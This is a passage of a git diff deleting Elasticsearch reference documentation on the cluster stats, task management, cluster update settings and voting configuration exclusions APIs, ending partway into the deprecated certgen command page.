-====== - -`filter_types`:: -(array of objects) -Contains statistics about <> types used in -selected nodes. -+ -.Properties of `filter_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Token filter type used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the token filter type in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the token filter type in selected nodes. -====== - -`analyzer_types`:: -(array of objects) -Contains statistics about <> types used in selected -nodes. -+ -.Properties of `analyzer_types` objects -[%collapsible%open] -====== -`name`:: -(string) -Analyzer type used in selected nodes. - -`count`:: -(integer) -Occurrences of the analyzer type in selected nodes. - -`index_count`:: -(integer) -Number of indices using the analyzer type in selected nodes. -====== - -`built_in_char_filters`:: -(array of objects) -Contains statistics about built-in <> -used in selected nodes. -+ -.Properties of `built_in_char_filters` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in character filter used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in character filter in -selected nodes. - -`index_count`:: -(integer) -Number of indices using the built-in character filter in selected nodes. -====== - -`built_in_tokenizers`:: -(array of objects) -Contains statistics about built-in <> used in -selected nodes. -+ -.Properties of `built_in_tokenizers` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in tokenizer used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in tokenizer in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the built-in tokenizer in selected nodes. -====== - -`built_in_filters`:: -(array of objects) -Contains statistics about built-in <> used -in selected nodes. -+ -.Properties of `built_in_filters` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in token filter used in selected nodes. - -`count`:: -(integer) -Number of analyzers or normalizers using the built-in token filter in selected -nodes. - -`index_count`:: -(integer) -Number of indices using the built-in token filter in selected nodes. -====== - -`built_in_analyzers`:: -(array of objects) -Contains statistics about built-in <> used in -selected nodes. -+ -.Properties of `built_in_analyzers` objects -[%collapsible%open] -====== -`name`:: -(string) -Built-in analyzer used in selected nodes. - -`count`:: -(integer) -Occurrences of the built-in analyzer in selected nodes. - -`index_count`:: -(integer) -Number of indices using the built-in analyzer in selected nodes. -====== -===== -==== - -[[cluster-stats-api-response-body-nodes]] -`nodes`:: -(object) -Contains statistics about nodes selected by the request's <>. -+ -.Properties of `nodes` -[%collapsible%open] -==== -`count`:: -(object) -Contains counts for nodes selected by the request's <>. -+ -.Properties of `count` -[%collapsible%open] -===== -`total`:: -(integer) -Total number of selected nodes. - -`coordinating_only`:: -(integer) -Number of selected nodes without a <>. These nodes are -considered <> nodes. - -``:: -(integer) -Number of selected nodes with the role. For a list of roles, see -<>. -===== - -`versions`:: -(array of strings) -Array of {es} versions used on selected nodes. - -`os`:: -(object) -Contains statistics about the operating systems used by selected nodes. 
-+ -.Properties of `os` -[%collapsible%open] -===== -`available_processors`:: -(integer) -Number of processors available to JVM across all selected nodes. - -`allocated_processors`:: -(integer) -Number of processors used to calculate thread pool size across all selected -nodes. -+ -This number can be set with the `processors` setting of a node and defaults to -the number of processors reported by the OS. In both cases, this number will -never be larger than `32`. - -`names`:: -(array of objects) -Contains statistics about operating systems used by selected nodes. -+ -.Properties of `names` -[%collapsible%open] -====== -`name`::: -(string) -Name of an operating system used by one or more selected nodes. - -`count`::: -(string) -Number of selected nodes using the operating system. -====== - -`pretty_names`:: -(array of objects) -Contains statistics about operating systems used by selected nodes. -+ -.Properties of `pretty_names` -[%collapsible%open] -====== -`pretty_name`::: -(string) -Human-readable name of an operating system used by one or more selected nodes. - -`count`::: -(string) -Number of selected nodes using the operating system. -====== - -`mem`:: -(object) -Contains statistics about memory used by selected nodes. -+ -.Properties of `mem` -[%collapsible%open] -====== -`total`:: -(<>) -Total amount of physical memory across all selected nodes. - -`total_in_bytes`:: -(integer) -Total amount, in bytes, of physical memory across all selected nodes. - -`free`:: -(<>) -Amount of free physical memory across all selected nodes. - -`free_in_bytes`:: -(integer) -Amount, in bytes, of free physical memory across all selected nodes. - -`used`:: -(<>) -Amount of physical memory in use across all selected nodes. - -`used_in_bytes`:: -(integer) -Amount, in bytes, of physical memory in use across all selected nodes. - -`free_percent`:: -(integer) -Percentage of free physical memory across all selected nodes. - -`used_percent`:: -(integer) -Percentage of physical memory in use across all selected nodes. -====== -===== - -`process`:: -(object) -Contains statistics about processes used by selected nodes. -+ -.Properties of `process` -[%collapsible%open] -===== -`cpu`:: -(object) -Contains statistics about CPU used by selected nodes. -+ -.Properties of `cpu` -[%collapsible%open] -====== -`percent`:: -(integer) -Percentage of CPU used across all selected nodes. Returns `-1` if -not supported. -====== - -`open_file_descriptors`:: -(object) -Contains statistics about open file descriptors in selected nodes. -+ -.Properties of `open_file_descriptors` -[%collapsible%open] -====== -`min`:: -(integer) -Minimum number of concurrently open file descriptors across all selected nodes. -Returns `-1` if not supported. - -`max`:: -(integer) -Maximum number of concurrently open file descriptors allowed across all selected -nodes. Returns `-1` if not supported. - -`avg`:: -(integer) -Average number of concurrently open file descriptors. Returns `-1` if not -supported. -====== -===== - -`jvm`:: -(object) -Contains statistics about the Java Virtual Machines (JVMs) used by selected -nodes. -+ -.Properties of `jvm` -[%collapsible%open] -===== -`max_uptime`:: -(<>) -Uptime duration since JVM last started. - -`max_uptime_in_millis`:: -(integer) -Uptime duration, in milliseconds, since JVM last started. - -`versions`:: -(array of objects) -Contains statistics about the JVM versions used by selected nodes. 
-+ -.Properties of `versions` -[%collapsible%open] -====== -`version`:: -(string) -Version of JVM used by one or more selected nodes. - -`vm_name`:: -(string) -Name of the JVM. - -`vm_version`:: -(string) -Full version number of JVM. -+ -The full version number includes a plus sign (`+`) followed by the build number. - -`vm_vendor`:: -(string) -Vendor of the JVM. - -`bundled_jdk`:: -(Boolean) -If `true`, the JVM includes a bundled Java Development Kit (JDK). - -`using_bundled_jdk`:: -(Boolean) -If `true`, a bundled JDK is in use by JVM. - -`count`:: -(integer) -Total number of selected nodes using JVM. -====== - -`mem`:: -(object) -Contains statistics about memory used by selected nodes. -+ -.Properties of `mem` -[%collapsible%open] -====== -`heap_used`:: -(<>) -Memory currently in use by the heap across all selected nodes. - -`heap_used_in_bytes`:: -(integer) -Memory, in bytes, currently in use by the heap across all selected nodes. - -`heap_max`:: -(<>) -Maximum amount of memory, in bytes, available for use by the heap across all -selected nodes. - -`heap_max_in_bytes`:: -(integer) -Maximum amount of memory, in bytes, available for use by the heap across all -selected nodes. -====== - -`threads`:: -(integer) -Number of active threads in use by JVM across all selected nodes. -===== - -`fs`:: -(object) -Contains statistics about file stores by selected nodes. -+ -.Properties of `fs` -[%collapsible%open] -===== -`total`:: -(<>) -Total size of all file stores across all selected nodes. - -`total_in_bytes`:: -(integer) -Total size, in bytes, of all file stores across all seleced nodes. - -`free`:: -(<>) -Amount of unallocated disk space in file stores across all selected nodes. - -`free_in_bytes`:: -(integer) -Total number of unallocated bytes in file stores across all selected nodes. - -`available`:: -(<>) -Total amount of disk space available to JVM in file -stores across all selected nodes. -+ -Depending on OS or process-level restrictions, this amount may be less than -`nodes.fs.free`. This is the actual amount of free disk space the selected {es} -nodes can use. - -`available_in_bytes`:: -(integer) -Total number of bytes available to JVM in file stores -across all selected nodes. -+ -Depending on OS or process-level restrictions, this number may be less than -`nodes.fs.free_in_byes`. This is the actual amount of free disk space the -selected {es} nodes can use. -===== - -`plugins`:: -(array of objects) -Contains statistics about installed plugins and modules by selected nodes. -+ -If no plugins or modules are installed, this array is empty. -+ -.Properties of `plugins` -[%collapsible%open] -===== - -``:: -(object) -Contains statistics about an installed plugin or module. -+ -.Properties of `` -[%collapsible%open] -====== -`name`::: -(string) -Name of the {es} plugin. - -`version`::: -(string) -{es} version for which the plugin was built. - -`elasticsearch_version`::: -(string) -{es} version for which the plugin was built. - -`java_version`::: -(string) -Java version for which the plugin was built. - -`description`::: -(string) -Short description of the plugin. - -`classname`::: -(string) -Class name used as the plugin's entry point. - -`extended_plugins`::: -(array of strings) -An array of other plugins extended by this plugin through the Java Service -Provider Interface (SPI). -+ -If this plugin extends no other plugins, this array is empty. - -`has_native_controller`::: -(Boolean) -If `true`, the plugin has a native controller process. 
-====== -===== - -`network_types`:: -(object) -Contains statistics about the transport and HTTP networks used by selected -nodes. -+ -.Properties of `network_types` -[%collapsible%open] -===== -`transport_types`:: -(object) -Contains statistics about the transport network types used by selected nodes. -+ -.Properties of `transport_types` -[%collapsible%open] -====== -``:: -(integer) -Number of selected nodes using the transport type. -====== - -`http_types`:: -(object) -Contains statistics about the HTTP network types used by selected nodes. -+ -.Properties of `http_types` -[%collapsible%open] -====== -``:: -(integer) -Number of selected nodes using the HTTP type. -====== -===== - -`discovery_types`:: -(object) -Contains statistics about the <> used by selected nodes. -+ -.Properties of `discovery_types` -[%collapsible%open] -===== -``:: -(integer) -Number of selected nodes using the <> to find other nodes. -===== - -`packaging_types`:: -(array of objects) -Contains statistics about {es} distributions installed on selected nodes. -+ -.Properties of `packaging_types` -[%collapsible%open] -===== -`flavor`::: -(string) -Type of {es} distribution, such as `default` or `OSS`, used by one or more -selected nodes. - -`type`::: -(string) -File type, such as `tar` or `zip`, used for the distribution package. - -`count`::: -(integer) -Number of selected nodes using the distribution flavor and file type. -===== -==== - -[[cluster-stats-api-example]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET /_cluster/stats?human&pretty --------------------------------------------------- -// TEST[setup:my_index] - -The API returns the following response: - -["source","js",subs="attributes,callouts"] --------------------------------------------------- -{ - "_nodes" : { - "total" : 1, - "successful" : 1, - "failed" : 0 - }, - "cluster_uuid": "YjAvIhsCQ9CbjWZb2qJw3Q", - "cluster_name": "elasticsearch", - "timestamp": 1459427693515, - "status": "green", - "indices": { - "count": 1, - "shards": { - "total": 5, - "primaries": 5, - "replication": 0, - "index": { - "shards": { - "min": 5, - "max": 5, - "avg": 5 - }, - "primaries": { - "min": 5, - "max": 5, - "avg": 5 - }, - "replication": { - "min": 0, - "max": 0, - "avg": 0 - } - } - }, - "docs": { - "count": 10, - "deleted": 0 - }, - "store": { - "size": "16.2kb", - "size_in_bytes": 16684, - "reserved": "0b", - "reserved_in_bytes": 0 - }, - "fielddata": { - "memory_size": "0b", - "memory_size_in_bytes": 0, - "evictions": 0 - }, - "query_cache": { - "memory_size": "0b", - "memory_size_in_bytes": 0, - "total_count": 0, - "hit_count": 0, - "miss_count": 0, - "cache_size": 0, - "cache_count": 0, - "evictions": 0 - }, - "completion": { - "size": "0b", - "size_in_bytes": 0 - }, - "segments": { - "count": 4, - "memory": "8.6kb", - "memory_in_bytes": 8898, - "terms_memory": "6.3kb", - "terms_memory_in_bytes": 6522, - "stored_fields_memory": "1.2kb", - "stored_fields_memory_in_bytes": 1248, - "term_vectors_memory": "0b", - "term_vectors_memory_in_bytes": 0, - "norms_memory": "384b", - "norms_memory_in_bytes": 384, - "points_memory" : "0b", - "points_memory_in_bytes" : 0, - "doc_values_memory": "744b", - "doc_values_memory_in_bytes": 744, - "index_writer_memory": "0b", - "index_writer_memory_in_bytes": 0, - "version_map_memory": "0b", - "version_map_memory_in_bytes": 0, - "fixed_bit_set": "0b", - "fixed_bit_set_memory_in_bytes": 0, - "max_unsafe_auto_id_timestamp" : -9223372036854775808, - "file_sizes": {} - }, - 
"mappings": { - "field_types": [] - }, - "analysis": { - "char_filter_types": [], - "tokenizer_types": [], - "filter_types": [], - "analyzer_types": [], - "built_in_char_filters": [], - "built_in_tokenizers": [], - "built_in_filters": [], - "built_in_analyzers": [] - } - }, - "nodes": { - "count": { - "total": 1, - "data": 1, - "coordinating_only": 0, - "master": 1, - "ingest": 1, - "voting_only": 0 - }, - "versions": [ - "{version}" - ], - "os": { - "available_processors": 8, - "allocated_processors": 8, - "names": [ - { - "name": "Mac OS X", - "count": 1 - } - ], - "pretty_names": [ - { - "pretty_name": "Mac OS X", - "count": 1 - } - ], - "mem" : { - "total" : "16gb", - "total_in_bytes" : 17179869184, - "free" : "78.1mb", - "free_in_bytes" : 81960960, - "used" : "15.9gb", - "used_in_bytes" : 17097908224, - "free_percent" : 0, - "used_percent" : 100 - } - }, - "process": { - "cpu": { - "percent": 9 - }, - "open_file_descriptors": { - "min": 268, - "max": 268, - "avg": 268 - } - }, - "jvm": { - "max_uptime": "13.7s", - "max_uptime_in_millis": 13737, - "versions": [ - { - "version": "12", - "vm_name": "OpenJDK 64-Bit Server VM", - "vm_version": "12+33", - "vm_vendor": "Oracle Corporation", - "bundled_jdk": true, - "using_bundled_jdk": true, - "count": 1 - } - ], - "mem": { - "heap_used": "57.5mb", - "heap_used_in_bytes": 60312664, - "heap_max": "989.8mb", - "heap_max_in_bytes": 1037959168 - }, - "threads": 90 - }, - "fs": { - "total": "200.6gb", - "total_in_bytes": 215429193728, - "free": "32.6gb", - "free_in_bytes": 35064553472, - "available": "32.4gb", - "available_in_bytes": 34802409472 - }, - "plugins": [ - { - "name": "analysis-icu", - "version": "{version}", - "description": "The ICU Analysis plugin integrates Lucene ICU module into elasticsearch, adding ICU relates analysis components.", - "classname": "org.elasticsearch.plugin.analysis.icu.AnalysisICUPlugin", - "has_native_controller": false - }, - ... - ], - "ingest": { - "number_of_pipelines" : 1, - "processor_stats": { - ... - } - }, - "network_types": { - ... - }, - "discovery_types": { - ... - }, - "packaging_types": [ - { - ... - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"plugins": \[[^\]]*\]/"plugins": $body.$_path/] -// TESTRESPONSE[s/"network_types": \{[^\}]*\}/"network_types": $body.$_path/] -// TESTRESPONSE[s/"discovery_types": \{[^\}]*\}/"discovery_types": $body.$_path/] -// TESTRESPONSE[s/"processor_stats": \{[^\}]*\}/"processor_stats": $body.$_path/] -// TESTRESPONSE[s/"count": \{[^\}]*\}/"count": $body.$_path/] -// TESTRESPONSE[s/"packaging_types": \[[^\]]*\]/"packaging_types": $body.$_path/] -// TESTRESPONSE[s/"field_types": \[[^\]]*\]/"field_types": $body.$_path/] -// TESTRESPONSE[s/: true|false/: $body.$_path/] -// TESTRESPONSE[s/: (\-)?[0-9]+/: $body.$_path/] -// TESTRESPONSE[s/: "[^"]*"/: $body.$_path/] -// These replacements do a few things: -// 1. Ignore the contents of the `plugins` object because we don't know all of -// the plugins that will be in it. And because we figure folks don't need to -// see an exhaustive list anyway. -// 2. Similarly, ignore the contents of `network_types`, `discovery_types`, and -// `packaging_types`. -// 3. Ignore the contents of the (nodes) count object, as what's shown here -// depends on the license. Voting-only nodes are e.g. only shown when this -// test runs with a basic license. -// 4. All of the numbers and strings on the right hand side of *every* field in -// the response are ignored. 
So we're really only asserting things about the -// the shape of this response, not the values in it. - -This API can be restricted to a subset of the nodes using <>: - -[source,console] --------------------------------------------------- -GET /_cluster/stats/nodes/node1,node*,master:false --------------------------------------------------- diff --git a/docs/reference/cluster/tasks.asciidoc b/docs/reference/cluster/tasks.asciidoc deleted file mode 100644 index 2994baf7204..00000000000 --- a/docs/reference/cluster/tasks.asciidoc +++ /dev/null @@ -1,327 +0,0 @@ -[[tasks]] -=== Task management API -++++ -Task management -++++ - -beta::["The task management API is new and should still be considered a beta feature. The API may change in ways that are not backwards compatible.",{es-issue}51628] - -Returns information about the tasks currently executing in the cluster. - -[[tasks-api-request]] -==== {api-request-title} - -`GET /_tasks/` - -`GET /_tasks` - -[[tasks-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `monitor` or -`manage` <> to use this API. - -[[tasks-api-desc]] -==== {api-description-title} - -The task management API returns information -about tasks currently executing -on one or more nodes in the cluster. - - -[[tasks-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=task-id] - - -[[tasks-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=actions] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=detailed] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=group-by] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=node-id-query-parm] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=parent-task-id] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the operation is complete. -Defaults to `false`. - -[[tasks-api-response-codes]] -==== {api-response-codes-title} - -// tag::tasks-api-404[] -`404` (Missing resources):: -If `` is specified but not found, this code indicates that there -are no resources that match the request. -// end::tasks-api-404[] - -[[tasks-api-examples]] -==== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _tasks <1> -GET _tasks?nodes=nodeId1,nodeId2 <2> -GET _tasks?nodes=nodeId1,nodeId2&actions=cluster:* <3> --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -<1> Retrieves all tasks currently running on all nodes in the cluster. -<2> Retrieves all tasks running on nodes `nodeId1` and `nodeId2`. See <> for more info about how to select individual nodes. -<3> Retrieves all cluster-related tasks running on nodes `nodeId1` and `nodeId2`. 
- -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "oTUltX4IQMOUUVeiohTt8A" : { - "name" : "H5dfFeA", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "tasks" : { - "oTUltX4IQMOUUVeiohTt8A:124" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 124, - "type" : "direct", - "action" : "cluster:monitor/tasks/lists[n]", - "start_time_in_millis" : 1458585884904, - "running_time_in_nanos" : 47402, - "cancellable" : false, - "parent_task_id" : "oTUltX4IQMOUUVeiohTt8A:123" - }, - "oTUltX4IQMOUUVeiohTt8A:123" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 123, - "type" : "transport", - "action" : "cluster:monitor/tasks/lists", - "start_time_in_millis" : 1458585884904, - "running_time_in_nanos" : 236042, - "cancellable" : false - } - } - } - } -} --------------------------------------------------- - -===== Retrieve information from a particular task - -It is also possible to retrieve information for a particular task. The following -example retrieves information about task `oTUltX4IQMOUUVeiohTt8A:124`: - -[source,console] --------------------------------------------------- -GET _tasks/oTUltX4IQMOUUVeiohTt8A:124 --------------------------------------------------- -// TEST[catch:missing] - -If the task isn't found, the API returns a 404. - -To retrieve all children of a particular task: - -[source,console] --------------------------------------------------- -GET _tasks?parent_task_id=oTUltX4IQMOUUVeiohTt8A:123 --------------------------------------------------- - -If the parent isn't found, the API does not return a 404. - - -===== Get more information about tasks - -You can also use the `detailed` request parameter to get more information about -the running tasks. This is useful for telling one task from another but is more -costly to execute. For example, fetching all searches using the `detailed` -request parameter: - -[source,console] --------------------------------------------------- -GET _tasks?actions=*search&detailed --------------------------------------------------- -// TEST[skip:No tasks to retrieve] - -The API returns the following result: - -[source,console-result] --------------------------------------------------- -{ - "nodes" : { - "oTUltX4IQMOUUVeiohTt8A" : { - "name" : "H5dfFeA", - "transport_address" : "127.0.0.1:9300", - "host" : "127.0.0.1", - "ip" : "127.0.0.1:9300", - "tasks" : { - "oTUltX4IQMOUUVeiohTt8A:464" : { - "node" : "oTUltX4IQMOUUVeiohTt8A", - "id" : 464, - "type" : "transport", - "action" : "indices:data/read/search", - "description" : "indices[test], types[test], search_type[QUERY_THEN_FETCH], source[{\"query\":...}]", - "start_time_in_millis" : 1483478610008, - "running_time_in_nanos" : 13991383, - "cancellable" : true - } - } - } - } -} --------------------------------------------------- - -The new `description` field contains human readable text that identifies the -particular request that the task is performing such as identifying the search -request being performed by a search task like the example above. Other kinds of -task have different descriptions, like <> which -has the search and the destination, or <> which just has the -number of requests and the destination indices. Many requests will only have an -empty description because more detailed information about the request is not -easily available or particularly helpful in identifying the request. 
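-
-For example, to inspect the descriptions of any running reindex tasks, you can
-combine an `actions` filter with the `detailed` parameter. This is a
-hypothetical variation on the snippet above; the task list is simply empty if
-no reindex is in flight:
-
-[source,console]
---------------------------------------------------
-GET _tasks?actions=*reindex&detailed
---------------------------------------------------
-// TEST[skip:No tasks to retrieve]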
- -[IMPORTANT] -============================== - -`_tasks` requests with `detailed` may also return a `status`. This is a report -of the internal status of the task. As such its format varies from task to task. -While we try to keep the `status` for a particular task consistent from version -to version this isn't always possible because we sometimes change the -implementation. In that case we might remove fields from the `status` for a -particular request so any parsing you do of the status might break in minor -releases. - -============================== - - -===== Wait for completion - -The task API can also be used to wait for completion of a particular task. The -following call will block for 10 seconds or until the task with id -`oTUltX4IQMOUUVeiohTt8A:12345` is completed. - -[source,console] --------------------------------------------------- -GET _tasks/oTUltX4IQMOUUVeiohTt8A:12345?wait_for_completion=true&timeout=10s --------------------------------------------------- -// TEST[catch:missing] - -You can also wait for all tasks for certain action types to finish. This command -will wait for all `reindex` tasks to finish: - -[source,console] --------------------------------------------------- -GET _tasks?actions=*reindex&wait_for_completion=true&timeout=10s --------------------------------------------------- - -[[task-cancellation]] -===== Task Cancellation - -If a long-running task supports cancellation, it can be cancelled with the cancel -tasks API. The following example cancels task `oTUltX4IQMOUUVeiohTt8A:12345`: - -[source,console] --------------------------------------------------- -POST _tasks/oTUltX4IQMOUUVeiohTt8A:12345/_cancel --------------------------------------------------- - -The task cancellation command supports the same task selection parameters as the -list tasks command, so multiple tasks can be cancelled at the same time. For -example, the following command will cancel all reindex tasks running on the -nodes `nodeId1` and `nodeId2`. - -`wait_for_completion`:: -(Optional, Boolean) If `true`, the request blocks until the cancellation of the -task and its descendant tasks is completed. Otherwise, the request can return soon -after the cancellation is started. Defaults to `false`. - -[source,console] --------------------------------------------------- -POST _tasks/_cancel?nodes=nodeId1,nodeId2&actions=*reindex --------------------------------------------------- - -===== Task Grouping - -The task lists returned by task API commands can be grouped either by nodes -(default) or by parent tasks using the `group_by` parameter. The following -command will change the grouping to parent tasks: - -[source,console] --------------------------------------------------- -GET _tasks?group_by=parents --------------------------------------------------- - -The grouping can be disabled by specifying `none` as a `group_by` parameter: - -[source,console] --------------------------------------------------- -GET _tasks?group_by=none --------------------------------------------------- - - -===== Identifying running tasks - -The `X-Opaque-Id` header, when provided on the HTTP request header, is going to -be returned as a header in the response as well as in the `headers` field for in -the task information. 
This allows to track certain calls, or associate certain -tasks with the client that started them: - -[source,sh] --------------------------------------------------- -curl -i -H "X-Opaque-Id: 123456" "http://localhost:9200/_tasks?group_by=parents" --------------------------------------------------- -//NOTCONSOLE - -The API returns the following result: - -[source,js] --------------------------------------------------- -HTTP/1.1 200 OK -X-Opaque-Id: 123456 <1> -content-type: application/json; charset=UTF-8 -content-length: 831 - -{ - "tasks" : { - "u5lcZHqcQhu-rUoFaqDphA:45" : { - "node" : "u5lcZHqcQhu-rUoFaqDphA", - "id" : 45, - "type" : "transport", - "action" : "cluster:monitor/tasks/lists", - "start_time_in_millis" : 1513823752749, - "running_time_in_nanos" : 293139, - "cancellable" : false, - "headers" : { - "X-Opaque-Id" : "123456" <2> - }, - "children" : [ - { - "node" : "u5lcZHqcQhu-rUoFaqDphA", - "id" : 46, - "type" : "direct", - "action" : "cluster:monitor/tasks/lists[n]", - "start_time_in_millis" : 1513823752750, - "running_time_in_nanos" : 92133, - "cancellable" : false, - "parent_task_id" : "u5lcZHqcQhu-rUoFaqDphA:45", - "headers" : { - "X-Opaque-Id" : "123456" <3> - } - } - ] - } - } -} --------------------------------------------------- -//NOTCONSOLE -<1> id as a part of the response header -<2> id for the tasks that was initiated by the REST request -<3> the child task of the task initiated by the REST request diff --git a/docs/reference/cluster/update-settings.asciidoc b/docs/reference/cluster/update-settings.asciidoc deleted file mode 100644 index 54f58696528..00000000000 --- a/docs/reference/cluster/update-settings.asciidoc +++ /dev/null @@ -1,143 +0,0 @@ -[[cluster-update-settings]] -=== Cluster update settings API -++++ -Cluster update settings -++++ - -Updates cluster-wide settings. - - -[[cluster-update-settings-api-request]] -==== {api-request-title} - -`PUT /_cluster/settings` - -[[cluster-update-settings-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[cluster-update-settings-api-desc]] -==== {api-description-title} - -With specifications in the request body, this API call can update cluster -settings. Updates to settings can be persistent, meaning they apply across -restarts, or transient, where they don't survive a full cluster restart. - -You can reset persistent or transient settings by assigning a `null` value. If a -transient setting is reset, the first one of these values that is defined is -applied: - -* the persistent setting -* the setting in the configuration file -* the default value. - -The order of precedence for cluster settings is: - -1. transient cluster settings -2. persistent cluster settings -3. settings in the `elasticsearch.yml` configuration file. - -It's best to set all cluster-wide settings with the `settings` API and use the -`elasticsearch.yml` file only for local configurations. This way you can be sure that -the setting is the same on all nodes. If, on the other hand, you define different -settings on different nodes by accident using the configuration file, it is very -difficult to notice these discrepancies. - - -[[cluster-update-settings-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=flat-settings] - -`include_defaults`:: - (Optional, Boolean) If `true`, returns all default cluster settings. - Defaults to `false`. 
- -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - - -[[cluster-update-settings-api-example]] -==== {api-examples-title} - -An example of a persistent update: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "persistent" : { - "indices.recovery.max_bytes_per_sec" : "50mb" - } -} --------------------------------------------------- - - -An example of a transient update: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings?flat_settings=true -{ - "transient" : { - "indices.recovery.max_bytes_per_sec" : "20mb" - } -} --------------------------------------------------- - - -The response to an update returns the changed setting, as in this response to -the transient example: - -[source,console-result] --------------------------------------------------- -{ - ... - "persistent" : { }, - "transient" : { - "indices.recovery.max_bytes_per_sec" : "20mb" - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"acknowledged": true,/] - - -This example resets a setting: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient" : { - "indices.recovery.max_bytes_per_sec" : null - } -} --------------------------------------------------- - - -The response does not include settings that have been reset: - -[source,console-result] --------------------------------------------------- -{ - ... - "persistent" : {}, - "transient" : {} -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"acknowledged": true,/] - - -You can also reset settings using wildcards. For example, to reset -all dynamic `indices.recovery` settings: - -[source,console] --------------------------------------------------- -PUT /_cluster/settings -{ - "transient" : { - "indices.recovery.*" : null - } -} --------------------------------------------------- diff --git a/docs/reference/cluster/voting-exclusions.asciidoc b/docs/reference/cluster/voting-exclusions.asciidoc deleted file mode 100644 index 021c1866240..00000000000 --- a/docs/reference/cluster/voting-exclusions.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[[voting-config-exclusions]] -=== Voting configuration exclusions API -++++ -Voting configuration exclusions -++++ - -Adds or removes master-eligible nodes from the -<>. - - -[[voting-config-exclusions-api-request]] -==== {api-request-title} - -`POST /_cluster/voting_config_exclusions?node_names=` + - -`POST /_cluster/voting_config_exclusions?node_ids=` + - -`DELETE /_cluster/voting_config_exclusions` - -[[voting-config-exclusions-api-prereqs]] -==== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have the `manage` -<> to use this API. - -[[voting-config-exclusions-api-desc]] -==== {api-description-title} - -By default, if there are more than three master-eligible nodes in the cluster -and you remove fewer than half of the master-eligible nodes in the cluster at -once, the <> automatically -shrinks. - -If you want to shrink the voting configuration to contain fewer than three nodes -or to remove half or more of the master-eligible nodes in the cluster at once, -you must use this API to remove departed nodes from the voting configuration -manually. It adds an entry for that node in the voting configuration exclusions -list. The cluster then tries to reconfigure the voting configuration to remove -that node and to prevent it from returning. - -If the API fails, you can safely retry it. 
Only a successful response -guarantees that the node has been removed from the voting configuration and will -not be reinstated. - -NOTE: Voting exclusions are required only when you remove at least half of the -master-eligible nodes from a cluster in a short time period. They are not -required when removing master-ineligible nodes or fewer than half of the -master-eligible nodes. - -For more information, see <>. - -[[voting-config-exclusions-api-query-params]] -==== {api-query-parms-title} - -`node_names`:: -A comma-separated list of the names of the nodes to exclude from the voting -configuration. If specified, you may not also specify `?node_ids`. - -`node_ids`:: -A comma-separated list of the persistent ids of the nodes to exclude from the -voting configuration. If specified, you may not also specify `?node_names`. - -`timeout`:: -(Optional, <>) When adding a voting configuration -exclusion, the API waits for the specified nodes to be excluded from the voting -configuration before returning. The period of time to wait is specified by the -`?timeout` query parameter. If the timeout expires before the appropriate -condition is satisfied, the request fails and returns an error. Defaults to -`30s`. - -`wait_for_removal`:: -(Optional, Boolean) Specifies whether to wait for all excluded nodes to be -removed from the cluster before clearing the voting configuration exclusions -list. Defaults to `true`, meaning that all excluded nodes must be removed from -the cluster before this API takes any action. If set to `false` then the voting -configuration exclusions list is cleared even if some excluded nodes are still -in the cluster. - -[[voting-config-exclusions-api-example]] -==== {api-examples-title} - -Adds nodes named `nodeName1` and `nodeName2` to the voting configuration -exclusions list: - -[source,console] --------------------------------------------------- -POST /_cluster/voting_config_exclusions?node_names=nodeName1,nodeName2 --------------------------------------------------- - -Remove all exclusions from the list: - -[source,console] --------------------------------------------------- -DELETE /_cluster/voting_config_exclusions --------------------------------------------------- diff --git a/docs/reference/commands/certgen.asciidoc b/docs/reference/commands/certgen.asciidoc deleted file mode 100644 index 78f5901312d..00000000000 --- a/docs/reference/commands/certgen.asciidoc +++ /dev/null @@ -1,160 +0,0 @@ -[role="xpack"] -[testenv="gold+"] -[[certgen]] -== elasticsearch-certgen - -deprecated[6.1,"Replaced by <>."] - -The `elasticsearch-certgen` command simplifies the creation of certificate -authorities (CA), certificate signing requests (CSR), and signed certificates -for use with the Elastic Stack. Though this command is deprecated, you do not -need to replace CAs, CSRs, or certificates that it created. - -[discrete] -=== Synopsis - -[source,shell] --------------------------------------------------- -bin/elasticsearch-certgen -(([--cert ] [--days ] [--dn ] [--key ] -[--keysize ] [--pass ] [--p12 ]) -| [--csr]) -[-E ] [-h, --help] [--in ] [--out ] -([-s, --silent] | [-v, --verbose]) --------------------------------------------------- - -[discrete] -=== Description - -By 